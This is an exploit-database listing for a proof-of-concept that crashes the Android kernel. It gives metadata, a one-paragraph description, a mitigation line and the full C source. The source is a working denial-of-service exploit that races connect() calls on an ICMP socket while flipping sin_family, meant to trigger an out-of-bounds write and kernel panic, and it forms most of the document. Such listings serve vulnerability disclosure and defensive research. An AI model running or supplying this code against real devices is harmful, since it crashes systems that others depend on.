Android Kernel Crash PoC

vendor:

Kernel

by:

Daniel Jiang

9,8

CVSS

HIGH

Out-of-bounds write

787

CWE

Product Name: Kernel

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2020

This PoC exploits an out-of-bounds write vulnerability in the Android kernel. The vulnerability is triggered when the sin_family field of the sockaddr_in structure is set to 0. This causes the kernel to write to an out-of-bounds memory location, resulting in a kernel panic.

Mitigation:

The vulnerability can be mitigated by ensuring that the sin_family field of the sockaddr_in structure is set to a valid value before calling connect().

Source

Exploit-DB raw data:

// Source: https://raw.githubusercontent.com/danieljiang0415/android_kernel_crash_poc/master/panic.c

#include <stdio.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <stdlib.h>
static int sockfd = 0;
static struct sockaddr_in addr = {0};

void fuzz(void * param){
    while(1){
        addr.sin_family = 0;//rand()%42;
        printf("sin_family1 = %08lx\n", addr.sin_family);
        connect(sockfd, (struct sockaddr *)&addr, 16); 
    }
}
int main(int argc, char **argv)
{
    sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
    int thrd;
    pthread_create(&thrd, NULL, fuzz, NULL);
    while(1){
        addr.sin_family = 0x1a;//rand()%42;
        addr.sin_port = 0;
        addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
        connect(sockfd, (struct sockaddr *)&addr, 16);
        addr.sin_family = 0;
    }
    return 0;
}